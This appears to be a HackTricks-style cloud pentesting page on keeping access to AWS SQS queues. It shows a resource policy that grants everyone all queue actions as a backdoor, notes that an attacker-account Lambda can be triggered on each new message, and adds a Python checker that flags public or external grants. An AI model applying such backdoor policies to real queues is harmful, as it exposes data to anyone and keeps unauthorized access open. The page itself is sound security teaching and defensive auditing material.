AWS - SQS Persistence

{{#include ../../../../banners/hacktricks-training.md}}

SQS

For more information check:

{{#ref}}
../../aws-services/aws-sqs-and-sns-enum.md
{{#endref}}

Using resource policy

In SQS, a queue resource policy indicates who has access to read from and write to the queue. It's possible to grant access to external accounts, to the ARNs of specific roles, or even to "*".\
The following policy gives everyone in AWS access to every action on the queue called MyTestQueue:

```json
{
  "Version": "2008-10-17",
  "Id": "__default_policy_ID",
  "Statement": [
    {
      "Sid": "__owner_statement",
      "Effect": "Allow",
      "Principal": {
        "AWS": "*"
      },
      "Action": ["SQS:*"],
      "Resource": "arn:aws:sqs:us-east-1:123123123123:MyTestQueue"
    }
  ]
}
```
πŸ“ Note
You could even **trigger a Lambda in the attacker's account every time a new message** is put in the queue (you would need to re-put it). For this follow these instructions: [https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html](https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html)
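As an added example (not HackTricks' own code), a small checker for the pattern above: it parses a queue policy document and reports every Allow statement whose principal is "*" or an account other than the queue owner, which is what a defender would look for when hunting for this backdoor. Both embedded policies are constructed samples built from the page's placeholder account; in practice the document comes from `get_queue_attributes` with `AttributeNames=['Policy']`.

```python
import json

# Constructed sample: the over-permissive policy shown on this page.
OPEN_POLICY = json.dumps({
    "Version": "2008-10-17",
    "Statement": [{
        "Sid": "__owner_statement",
        "Effect": "Allow",
        "Principal": {"AWS": "*"},
        "Action": ["SQS:*"],
        "Resource": "arn:aws:sqs:us-east-1:123123123123:MyTestQueue",
    }],
})

# Constructed sample: the same queue restricted to its owning account.
LOCKED_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "owner_only",
        "Effect": "Allow",
        "Principal": {"AWS": "arn:aws:iam::123123123123:root"},
        "Action": "SQS:*",
        "Resource": "arn:aws:sqs:us-east-1:123123123123:MyTestQueue",
    }],
})

def principals(statement):
    """Normalise the Principal field to a list of AWS principal strings (service principals ignored)."""
    principal = statement.get("Principal", {})
    if principal == "*":
        return ["*"]
    aws = principal.get("AWS", []) if isinstance(principal, dict) else []
    return [aws] if isinstance(aws, str) else list(aws)

def account_of(principal):
    """Return the account id behind "*", a bare 12-digit id, or an ARN such as arn:aws:iam::123:root."""
    if principal == "*" or principal.isdigit():
        return principal
    parts = principal.split(":")
    return parts[4] if len(parts) >= 6 and parts[0] == "arn" else principal

def audit_queue_policy(policy_json, owner_account):
    """Return (Sid, principal, kind) for each Allow that reaches outside owner_account.
    A Condition (e.g. aws:SourceArn on an SNS-fed queue) may scope a "*" grant, so it is reported separately."""
    findings = []
    for st in json.loads(policy_json).get("Statement", []):
        if st.get("Effect") != "Allow":
            continue
        suffix = "-with-condition" if "Condition" in st else ""
        for p in principals(st):
            acct = account_of(p)
            if acct == "*":
                findings.append((st.get("Sid"), p, "public" + suffix))
            elif acct != owner_account:
                findings.append((st.get("Sid"), p, "external-account" + suffix))
    return findings

if __name__ == "__main__":
    for name, pol in (("open", OPEN_POLICY), ("locked", LOCKED_POLICY)):
        print(name, audit_queue_policy(pol, "123123123123"))
```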

More SQS Persistence Techniques

{{#ref}}
aws-sqs-dlq-backdoor-persistence.md
{{#endref}}

{{#ref}}
aws-sqs-orgid-policy-backdoor.md
{{#endref}}

{{#include ../../../../banners/hacktricks-training.md}}